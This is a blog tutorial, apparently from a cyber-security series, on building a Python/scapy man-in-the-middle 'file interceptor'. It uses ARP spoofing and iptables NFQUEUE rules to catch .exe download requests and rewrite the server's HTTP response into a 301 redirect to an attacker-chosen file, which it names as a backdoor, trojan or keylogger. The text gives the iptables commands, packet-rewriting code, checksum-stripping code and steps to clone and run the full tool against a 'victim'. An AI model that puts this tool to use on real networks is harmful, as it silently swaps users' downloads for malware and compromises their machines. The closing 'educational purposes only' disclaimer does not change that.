Writing a File Interceptor Program in Python: Coding for Cyber Security (Program №5) MITM

Anandita
Anandita
Nov 9, 2020 · 4 min read

I have explained how a basic file interceptor program is developed using python in this article. Keep in mind that before running this program, We need to run the ARP spoofer. Then run the iptables command.

If you are targeting the remote computers, then redirect the FORWARD chain to your queue using the following command -

iptables -I FORWARD -j NFQUEUE --queue-num 0

If you are testing on your local machines, then redirect the INPUT & OUTPUT chains.

iptables -I INPUT -j NFQUEUE --queue-num 0
iptables -I OUTPUT -j NFQUEUE --queue-num 0

We were modifying data in the DNS layer in our previous DNS Spoofer Program, Now we are going to modify the data in the HTTP layer to perform this attack.

HOW DOES A FILE INTERCEPTOR WORK?

User requesting a file from the server

After detection, we serve a different file to the user that could also be malicious. It could be anything like a backdoor, trojan or a keylogger.

Attacker replacing the file with a malicious file

WRITING THE PROGRAM

Step 1 : Intercepting the packets

I have used a function which converts a normal packet into a scapy packet.

So, I will be explaining it line by line.

  1. Importing the scapy and netfilterqueue modules. Then defining a function and converting the captured packet into a scapy packet so that it can be modified later. I have performed modifications after the interception part.

2. I have checked whether the packet contains an HTTP layer or not and separated the requests & the responses by making use of the following code.

Step 2 : Modification of Packets

I have created a list for this purpose. The useful information is appended to the list and the rest is removed from it by using the following piece of code.

acknowledge_list = []# appending values
if "exe" in pkt_scapy[scapy.Raw].load:
print("[*] exe Request")
acknowledge_list.append(pkt_scapy[scapy.TCP].ack)
# eliminating values
if pkt_scapy[scapy.TCP].seq in acknowledge_list:
acknowledge_list.remove(pkt_scapy[scapy.TCP].seq)
print("[*] Replacing File ")

The program is able to detect the requests and responses for the downloads now, I will show you how to replace the downloaded file with the malicious one.

Replacing the Download file

In general, there are status codes for each response issued by a server on every request made by the client. For example,

  1. 1xx: Informational
  2. 2xx: Success
  3. 3xx: Redirection
  4. 4xx: Client Error
  5. 5xx: Server Error

I will use 301 status code for this program as we intend to redirect the client’s request. So, I will add the server response of this status code to our program. I just have to replace the Location with the location of the file that I want the user to download.

HTTP/1.1 301 Moved Permanently
Location: https://www.example.org/index.asp

This is how I have used it in my code :

pkt_scapy[scapy.Raw].load = "HTTP/1.1 301 Moved Permanently\nLocation: https://www.example.org/abc.exe\n\n"

Now, I will remove some fields from our response as the values have been modified and the length as well as the checksum have changed. So, we can not use the old ones. I will remove them by defining a function :

def setting_load(packet, load):
packet[scapy.Raw].load = load
del packet[scapy.IP].len
del packet[scapy.IP].chksm
del packet[scapy.TCP].len
del packet[scapy.TCP].chksm
return packet

I have made some more modifications so that the program looks even more clear. And the final code is :

RUNNING THE FILE INTERCEPTOR PROGRAM

# pip install NetfilterQueue
# pip install scapy
  1. Run the ARP Spoofer program to work as Man In The Middle. The tutorial of ARPspoof is given in my previous article.
  2. Run the iptables command :

If you are targeting the remote computers, then redirect the FORWARD chain to your queue using the following command -

iptables -I FORWARD -j NFQUEUE --queue-num 0

If you are testing on your local machines, then redirect the INPUT & OUTPUT chains.

iptables -I INPUT -j NFQUEUE --queue-num 0
iptables -I OUTPUT -j NFQUEUE --queue-num 0

3. Then make changes in the program as per your choice, you can replace the Location file with any of your chosen payloads. Our program is now ready to run. 🙂

As soon as the victim tries to download any file on his machine, the newly replaced file will download automatically on his computer instead of the legitimate file. We can add any malicious file, trojan or backdoor.

The same code is also available on github, it can be accessed using the following commands :

# git clone https://github.com/An4ndita/file-interceptor.git
# cd file-interceptor
# mousepad replace-downloads.py
Edit the Location: & Replace it with the link of the file that you want the victim to download.
# python3 replace-downloads.py

Happy Hacking 🙂 Remember that this content is made available for educational & informational purposes only!🌼 Follow me for more articles on cyber security and please give me your feedback. 🤩

The Startup

Get smarter at building your thing. Join The Startup’s +745K followers.